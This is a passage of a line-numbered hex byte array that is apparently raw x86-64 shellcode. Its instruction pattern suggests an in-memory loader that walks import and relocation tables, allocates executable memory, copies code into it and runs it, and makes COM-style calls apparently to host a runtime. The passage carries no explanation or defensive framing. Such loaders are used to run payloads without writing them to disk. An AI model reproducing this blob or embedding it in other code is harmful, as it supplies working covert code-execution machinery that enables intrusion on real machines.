567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
